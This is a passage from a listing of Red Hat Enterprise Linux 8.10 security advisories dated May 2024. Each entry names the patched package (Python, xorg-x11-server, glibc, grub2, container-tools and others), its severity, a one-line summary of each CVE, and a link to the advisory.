References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2982
22.05.2024 03:00:00	redhat	[RHSA-2024:2985] python39:3.9 and python39-devel:3.9 security update (moderate)	Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems.Security Fix(es):* pypa-setuptools: Regular Expression Denial of Service (ReDoS) in package_index.py (CVE-2022-40897)* python-cryptography: memory corruption via immutable objects (CVE-2023-23931)* python: Parsing errors in email/_parseaddr.py lead to incorrect value in email address part of tuple (CVE-2023-27043)* python-urllib3: Cookie request header isn't stripped during cross-origin redirects (CVE-2023-43804)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2985
22.05.2024 03:00:00	redhat	[RHSA-2024:2987] python27:2.7 security update (moderate)	Python is an interpreted, interactive, object-oriented programming language that supports modules, classes, exceptions, high-level dynamic data types, and dynamic typing. The python27 packages provide a stable release of Python 2.7 with a number of additional utilities and database connectors for MySQL and PostgreSQL.Security Fix(es):* pypa-setuptools: Regular Expression Denial of Service (ReDoS) in package_index.py (CVE-2022-40897)* python: use after free in heappushpop() of heapq module (CVE-2022-48560)* python: XML External Entity in XML processing plistlib module (CVE-2022-48565)* python-urllib3: Cookie request header isn't stripped during cross-origin redirects (CVE-2023-43804)* jinja2: HTML attribute injection when passing user input as keys to xmlattr filter (CVE-2024-22195)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2987
22.05.2024 03:00:00	redhat	[RHSA-2024:3127] zziplib security update (moderate)	The zziplib is a lightweight library to easily extract data from zip files.Security Fix(es):* zziplib: invalid memory access at zzip_disk_entry_to_file_header in mmapped.c (CVE-2020-18770)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3127
22.05.2024 03:00:00	redhat	[RHSA-2024:3128] perl:5.32 security update (moderate)	Perl is a high-level programming language that is commonly used for system administration utilities and web programming.Security Fix(es):* perl: Write past buffer end via illegal user-defined Unicode property (CVE-2023-47038)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3128
22.05.2024 03:00:00	redhat	[RHSA-2024:2988] container-tools:rhel8 security update (moderate)	The container-tools module contains tools for working with containers, notably podman, buildah, skopeo, and runc.Security Fix(es):* urllib3: urllib3 does not remove the authorization HTTP header when following a cross-origin redirect (CVE-2018-25091)* golang: math/big.Rat: may cause a panic or an unrecoverable fatal error if passed inputs with very large exponents (CVE-2021-33198)* golang: crypto/tls: certificate of wrong type is causing TLS client to panic (CVE-2021-34558)* golang: archive/tar: unbounded memory consumption when reading headers (CVE-2022-2879)* golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters (CVE-2022-2880)* golang: regexp/syntax: limit memory used by parsing regexps (CVE-2022-41715)* golang: crypto/tls: slow verification of certificate chains containing large RSA keys (CVE-2023-29409)* golang: html/template: improper handling of HTML-like comments within script contexts (CVE-2023-39318)* golang: html/template: improper handling of special tags within script contexts (CVE-2023-39319)* golang: crypto/tls: panic when processing post-handshake message on QUIC connections (CVE-2023-39321)* golang: crypto/tls: lack of a limit on buffered post-handshake (CVE-2023-39322)* golang: net/http/internal: Denial of Service (DoS) via Resource Consumption via HTTP requests (CVE-2023-39326)* golang: crypto/tls: Timing Side Channel attack in RSA based TLS key exchanges. (CVE-2023-45287)* urllib3: Request body not stripped after redirect from 303 status changes request method to GET (CVE-2023-45803)* ssh: Prefix truncation attack on Binary Packet Protocol (BPP) (CVE-2023-48795)* moby/buildkit: Possible race condition with accessing subpaths from cache mounts (CVE-2024-23650)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2988
22.05.2024 03:00:00	redhat	[RHSA-2024:2995] xorg-x11-server security update (moderate)	X.Org is an open-source implementation of the X Window System. It provides the basic low-level functionality that full-fledged graphical user interfaces are designed upon.Security Fix(es):* xorg-x11-server: Out-of-bounds write in XIChangeDeviceProperty/RRChangeOutputProperty (CVE-2023-5367)* xorg-x11-server: out-of-bounds memory reads/writes in XKB button actions (CVE-2023-6377)* xorg-x11-server: out-of-bounds memory read in RRChangeOutputProperty and RRChangeProviderProperty (CVE-2023-6478)* xorg-x11-server: reattaching to different master device may lead to out-of-bounds memory access (CVE-2024-0229)* xorg-x11-server: SELinux unlabeled GLX PBuffer (CVE-2024-0408)* xorg-x11-server: SELinux context corruption (CVE-2024-0409)* xorg-x11-server: heap buffer overflow in XISendDeviceHierarchyEvent (CVE-2024-21885)* xorg-x11-server: heap buffer overflow in DisableDevice (CVE-2024-21886)* xorg-x11-server: Use-after-free bug in DestroyWindow (CVE-2023-5380)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2995
22.05.2024 03:00:00	redhat	[RHSA-2024:2996] xorg-x11-server-Xwayland security update (moderate)	Xwayland is an X server for running X clients under Wayland.Security Fix(es):* xorg-x11-server: Out-of-bounds write in XIChangeDeviceProperty/RRChangeOutputProperty (CVE-2023-5367)* xorg-x11-server: out-of-bounds memory reads/writes in XKB button actions (CVE-2023-6377)* xorg-x11-server: out-of-bounds memory read in RRChangeOutputProperty and RRChangeProviderProperty (CVE-2023-6478)* xorg-x11-server: Heap buffer overflow in DeviceFocusEvent and ProcXIQueryPointer (CVE-2023-6816)* xorg-x11-server: reattaching to different master device may lead to out-of-bounds memory access (CVE-2024-0229)* xorg-x11-server: SELinux unlabeled GLX PBuffer (CVE-2024-0408)* xorg-x11-server: SELinux context corruption (CVE-2024-0409)* xorg-x11-server: heap buffer overflow in XISendDeviceHierarchyEvent (CVE-2024-21885)* xorg-x11-server: heap buffer overflow in DisableDevice (CVE-2024-21886)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2996
22.05.2024 03:00:00	redhat	[RHSA-2024:3138] kernel security, bug fix, and enhancement update (moderate)	The kernel packages contain the Linux kernel, the core of any Linux operating system.Security Fix(es):For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3138
22.05.2024 03:00:00	redhat	[RHSA-2024:3163] pam security update (moderate)	Pluggable Authentication Modules (PAM) provide a system to set up authentication policies without the need to recompile programs to handle authentication.Security Fix(es):* pam: allowing unprivileged user to block another user namespace (CVE-2024-22365)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3163
22.05.2024 03:00:00	redhat	[RHSA-2024:3211] traceroute security update (moderate)	The traceroute utility displays the route used by IP packets on their way to a specified network (or Internet) host.Security Fix(es):* traceroute: improper command line parsing (CVE-2023-46316)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3211
22.05.2024 03:00:00	redhat	[RHSA-2024:3005] python-pillow security update (moderate)	The python-pillow packages contain a Python image processing library that provides extensive file format support, an efficient internal representation, and powerful image-processing capabilities.Security Fix(es):* python-pillow: uncontrolled resource consumption when textlength in an ImageDraw instance operates on a long text argument (CVE-2023-44271)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3005
22.05.2024 03:00:00	redhat	[RHSA-2024:3008] pmix security update (important)	The Process Management Interface (PMI) provides process management functions for MPI implementations. PMI Exascale (PMIx) provides an extended version of the PMI standard specifically designed to support clusters up to and including exascale sizes.Security Fix(es):* pmix: race condition allows attackers to obtain ownership of arbitrary files (CVE-2023-41915)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3008
22.05.2024 03:00:00	redhat	[RHSA-2024:3017] edk2 security update (important)	EDK (Embedded Development Kit) is a project to enable UEFI support for Virtual Machines. This package contains a sample 64-bit UEFI firmware for QEMU and KVM. Security Fix(es):* edk2: Buffer overflow when handling Server ID option from a DHCPv6 proxy Advertise message (CVE-2023-45235)* EDK2: heap buffer overflow in Tcg2MeasureGptTable() (CVE-2022-36763)* EDK2: heap buffer overflow in Tcg2MeasurePeImage() (CVE-2022-36764)* EDK2: integer overflow in CreateHob() could lead to HOB OOB R/W (CVE-2022-36765)* edk2: Integer underflow when processing IA_NA/IA_TA options in a DHCPv6 Advertise message (CVE-2023-45229)* edk2: Out of Bounds read when handling a ND Redirect message with truncated options (CVE-2023-45231)* edk2: Infinite loop when parsing unknown options in the Destination Options header (CVE-2023-45232)* edk2: Infinite loop when parsing a PadN option in the Destination Options header (CVE-2023-45233)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3017
22.05.2024 03:00:00	redhat	[RHSA-2024:3022] motif security update (moderate)	The motif packages include the Motif shared libraries needed to run applications which are dynamically linked against Motif, as well as MWM, the Motif Window Manager.Security Fix(es):* libXpm: out of bounds read in XpmCreateXpmImageFromBuffer() (CVE-2023-43788)* libXpm: out of bounds read on XPM with corrupted colormap (CVE-2023-43789)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3022
22.05.2024 03:00:00	redhat	[RHSA-2024:3047] 389-ds:1.4 security update (moderate)	389 Directory Server is an LDAP version 3 (LDAPv3) compliant server. The base packages include the Lightweight Directory Access Protocol (LDAP) server and command-line utilities for server administration. Security Fix(es):* 389-ds-base: a heap overflow leading to denail-of-servce while writing a value larger than 256 chars (in log_entry_attr) (CVE-2024-1062)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3047
22.05.2024 03:00:00	redhat	[RHSA-2024:3214] gmp security update (moderate)	The gmp packages contain GNU MP, a library for arbitrary precision arithmetics, signed integers operations, rational numbers, and floating point numbers. Security Fix(es):* gmp: Integer overflow and resultant buffer overflow via crafted input (CVE-2021-43618)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3214
22.05.2024 03:00:00	redhat	[RHSA-2024:3253] virt:rhel and virt-devel:rhel security update (moderate)	Kernel-based Virtual Machine (KVM) offers a full virtualization solution for Linux on numerous hardware platforms. The virt:rhel module contains packages which provide user-space components used to run virtual machines using KVM. The packages also provide APIs for managing and interacting with the virtualized systems.Security Fix(es):* libvirt: negative g_new0 length can lead to unbounded memory allocation (CVE-2024-2494)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3253
22.05.2024 03:00:00	redhat	[RHSA-2024:3264] pcp security update (important)	Performance Co-Pilot (PCP) is a suite of tools, services, and libraries for acquisition, archiving, and analysis of system-level performance measurements. Its light-weight distributed architecture makes it particularly well-suited to centralized analysis of complex systems.Security Fix(es):* pcp: exposure of the redis server backend allows remote command execution via pmproxy (CVE-2024-3019)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3264
22.05.2024 03:00:00	redhat	[RHSA-2024:3265] grafana security update (important)	Grafana is an open source, feature rich metrics dashboard and graph editor forGraphite, InfluxDB & OpenTSDB.Security Fix(es):* golang-fips/openssl: Memory leaks in code encrypting and decrypting RSA payloads (CVE-2024-1394)* grafana: vulnerable to authorization bypass (CVE-2024-1313)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3265
22.05.2024 03:00:00	redhat	[RHSA-2024:3058] mutt security update (moderate)	Mutt is a low resource, highly configurable, text-based MIME e-mail client. Mutt supports most e-mail storing formats, such as mbox and Maildir, as well as most protocols, including POP3 and IMAP.Security Fix(es):* mutt: null pointer dereference (CVE-2023-4874)* mutt: null pointer dereference (CVE-2023-4875)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3058
22.05.2024 03:00:00	redhat	[RHSA-2024:3060] gstreamer1-plugins-bad-free security update (moderate)	GStreamer is a streaming media framework based on graphs of filters which operate on media data. The gstreamer1-plugins-bad-free package contains a collection of plug-ins for GStreamer.Security Fix(es):* gstreamer-plugins-bad: Integer overflow leading to heap overwrite in MXF file handling with uncompressed video (CVE-2023-40474)* gstreamer-plugins-bad: Integer overflow leading to heap overwrite in MXF file handling with AES3 audio (CVE-2023-40475)* gstreamer-plugins-bad: Integer overflow in H.265 video parser leading to stack overwrite (CVE-2023-40476)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3060
22.05.2024 03:00:00	redhat	[RHSA-2024:3062] python3.11 security update (moderate)	Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems.Security Fix(es):* python: Parsing errors in email/_parseaddr.py lead to incorrect value in email address part of tuple (CVE-2023-27043)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3062
22.05.2024 03:00:00	redhat	[RHSA-2024:3067] tigervnc security update (moderate)	Virtual Network Computing (VNC) is a remote display system which allows users to view a computing desktop environment not only on the machine where it is running, but from anywhere on the Internet and from a wide variety of machine architectures. TigerVNC is a suite of VNC servers and clients.Security Fix(es):* xorg-x11-server: Use-after-free bug in DestroyWindow (CVE-2023-5380)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3067
22.05.2024 03:00:00	redhat	[RHSA-2024:3088] gstreamer1-plugins-base security update (moderate)	GStreamer is a streaming media framework based on graphs of filters which operate on media data. The gstreamer1-plugins-base packages contain a collection of well-maintained base plug-ins.Security Fix(es):* gstreamer-plugins-base: heap overwrite in subtitle parsing (CVE-2023-37328)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3088
22.05.2024 03:00:00	redhat	[RHSA-2024:3089] gstreamer1-plugins-good security update (moderate)	GStreamer is a streaming media framework based on graphs of filters which operate on media data. The gstreamer1-plugins-good packages contain a collection of well-supported plug-ins of good quality and under the LGPL license.Security Fix(es):* gstreamer-plugins-good: integer overflow leading to heap overwrite in FLAC image tag handling (CVE-2023-37327)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3089
22.05.2024 03:00:00	redhat	[RHSA-2024:3267] idm:DL1 and idm:client security update (moderate)	Red Hat Identity Management (IdM) is a centralized authentication, identity management, and authorization solution for both traditional and cloud-based enterprise environments. Security Fix(es):* JWCrypto: denail of service Via specifically crafted JWE (CVE-2023-6681)* python-jwcrypto: malicious JWE token can cause denial of service (CVE-2024-28102)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3267
22.05.2024 03:00:00	redhat	[RHSA-2024:3269] glibc security update (important)	The glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the name service cache daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.Security Fix(es):* glibc: Out of bounds write in iconv may lead to remote code execution (CVE-2024-2961)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3269
22.05.2024 03:00:00	redhat	[RHSA-2024:3275] python-dns security update (moderate)	The python-dns package contains the dnslib module that implements a DNS client and additional modules that define certain symbolic constants used by DNS, such as dnstype, dnsclass and dnsopcode.Security Fix(es):* dnspython: denial of service in stub resolver (CVE-2023-29483)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3275
22.05.2024 03:00:00	redhat	[RHSA-2024:3095] vorbis-tools security update (moderate)	The vorbis-tools packages provide an encoder, a decoder, a playback tool, and a comment editor for Ogg Vorbis. Ogg Vorbis is a fully open, non-proprietary, patent- and royalty-free, general-purpose compressed audio format.Security Fix(es):* vorbis-tools: Buffer Overflow vulnerability (CVE-2023-43361)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3095
22.05.2024 03:00:00	redhat	[RHSA-2024:3102] python-jinja2 security update (moderate)	The python-jinja2 package contains Jinja2, a template engine written in pure Python. Jinja2 provides a Django inspired non-XML syntax but supports inline expressions and an optional sandboxed environment. Security Fix(es):* jinja2: HTML attribute injection when passing user input as keys to xmlattr filter (CVE-2024-22195)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3102
22.05.2024 03:00:00	redhat	[RHSA-2024:3105] python3.11-cryptography security update (moderate)	The python-cryptography packages contain a Python Cryptographic Authority's (PyCA's) cryptography library, which provides cryptographic primitives and recipes to Python developers.Security Fix(es):* python-cryptography: NULL-dereference when loading PKCS7 certificates (CVE-2023-49083)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3105
22.05.2024 03:00:00	redhat	[RHSA-2024:3120] freeglut security update (moderate)	freeglut is a completely open source alternative to the OpenGL Utility Toolkit (GLUT) library with an OSI approved free software license.Security Fix(es):* freeglut: memory leak via glutAddSubMenu() function (CVE-2024-24258)* freeglut: memory leak via glutAddMenuEntry() function (CVE-2024-24259)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3120
22.05.2024 03:00:00	redhat	[RHSA-2024:3139] squashfs-tools security update (moderate)	SquashFS is a highly compressed read-only file system for Linux. These packages contain the utilities for manipulating squashfs file systems.Security Fix(es):* squashfs-tools: unvalidated filepaths allow writing outside of destination (CVE-2021-40153)* squashfs-tools: possible Directory Traversal via symbolic link (CVE-2021-41072)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3139
22.05.2024 03:00:00	redhat	[RHSA-2024:3166] openssh security update (moderate)	OpenSSH is an SSH protocol implementation supported by a number of Linux, UNIX, and similar operating systems. It includes the core files necessary for both the OpenSSH client and server.Security Fix(es):* openssh: scp allows command injection when using backtick characters in the destination argument (CVE-2020-15778)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3166
22.05.2024 03:00:00	redhat	[RHSA-2024:3178] linux-firmware security update (important)	The linux-firmware packages contain all of the firmware files that are required by various devices to operate.Security Fix(es):* hw: intel: Protection mechanism failure for some Intel(R) PROSet/Wireless WiFi (CVE-2022-46329)* hw: amd: INVD instruction may lead to a loss of SEV-ES guest machine memory integrity problem (CVE-2023-20592)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3178
22.05.2024 03:00:00	redhat	[RHSA-2024:3184] grub2 security update (moderate)	The grub2 packages provide version 2 of the Grand Unified Boot Loader (GRUB), a highly configurable and customizable boot loader with modular architecture. The packages support a variety of kernel formats, file systems, computer architectures, and hardware devices.Security Fix(es):* grub2: grub2-set-bootflag can be abused by local (pseudo-)users (CVE-2024-1048)* grub2: Out-of-bounds write at fs/ntfs.c may lead to unsigned code execution (CVE-2023-4692)* grub2: out-of-bounds read at fs/ntfs.c (CVE-2023-4693)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3184
22.05.2024 03:00:00	redhat	[RHSA-2024:3203] systemd security update (moderate)	The systemd packages contain systemd, a system and service manager for Linux, compatible with the SysV and LSB init scripts. It provides aggressive parallelism capabilities, uses socket and D-Bus activation for starting services, offers on-demand starting of daemons, and keeps track of processes using Linux cgroups. In addition, it supports snapshotting and restoring of the system state, maintains mount and automount points, and implements an elaborate transactional dependency-based service control logic. It can also work as a drop-in replacement for sysvinit.Security Fix(es):* systemd-resolved: Unsigned name response in signed zone is not refused when DNSSEC=yes (CVE-2023-7008)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3203
22.05.2024 03:00:00	redhat	[RHSA-2024:3233] libssh security update (low)	libssh is a library which implements the SSH protocol. It can be used to implement client and server applications.Security Fix(es):* libssh: ProxyCommand/ProxyJump features allow injection of malicious code through hostname (CVE-2023-6004)* libssh: Missing checks for return values for digests (CVE-2023-6918)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3233
22.05.2024 03:00:00	redhat	[RHSA-2024:3254] container-tools:rhel8 security update (important)	The container-tools module contains tools for working with containers, notably podman, buildah, skopeo, and runc.Security Fix(es):* buildah: full container escape at build time (CVE-2024-1753)* golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters (CVE-2022-2880)* golang: regexp/syntax: limit memory used by parsing regexps (CVE-2022-41715)* golang-protobuf: encoding/protojson, internal/encoding/json: infinite loop in protojson.Unmarshal when unmarshaling certain forms of invalid JSON (CVE-2024-24786)* jose-go: improper handling of highly compressed data (CVE-2024-28180)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3254
22.05.2024 03:00:00	redhat	[RHSA-2024:3258] xorg-x11-server security update (moderate)	X.Org is an open-source implementation of the X Window System. It provides the basic low-level functionality that full-fledged graphical user interfaces are designed upon.Security Fix(es):* xorg-x11-server: Heap buffer overread/data leakage in ProcXIGetSelectedEvents (CVE-2024-31080)* xorg-x11-server: Heap buffer overread/data leakage in ProcXIPassiveGrabDevice (CVE-2024-31081)* xorg-x11-server: Use-after-free in ProcRenderAddGlyphs (CVE-2024-31083)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3258
22.05.2024 03:00:00	redhat	[RHSA-2024:3259] go-toolset:rhel8 security update (important)	Go Toolset provides the Go programming language tools and libraries. Go is alternatively known as golang. Security Fix(es):* golang: net/http, x/net/http2: unlimited number of CONTINUATION frames causes DoS (CVE-2023-45288)* golang: net/http/cookiejar: incorrect forwarding of sensitive headers and cookies on HTTP redirect (CVE-2023-45289)* golang: net/http: memory exhaustion in Request.ParseMultipartForm (CVE-2023-45290)* golang: crypto/x509: Verify panics on certificates with an unknown public key algorithm (CVE-2024-24783)* golang: net/mail: comments in display names are incorrectly handled (CVE-2024-24784)* golang: html/template: errors returned from MarshalJSON methods may break template escaping (CVE-2024-24785)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3259
22.05.2024 03:00:00	redhat	[RHSA-2024:3261] tigervnc security update (important)	Virtual Network Computing (VNC) is a remote display system which allows users to view a computing desktop environment not only on the machine where it is running, but from anywhere on the Internet and from a wide variety of machine architectures. TigerVNC is a suite of VNC servers and clients.Security Fix(es):* xorg-x11-server: Heap buffer overread/data leakage in ProcXIGetSelectedEvents (CVE-2024-31080)* xorg-x11-server: Heap buffer overread/data leakage in ProcXIPassiveGrabDevice (CVE-2024-31081)* xorg-x11-server: Use-after-free in ProcRenderAddGlyphs (CVE-2024-31083)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3261
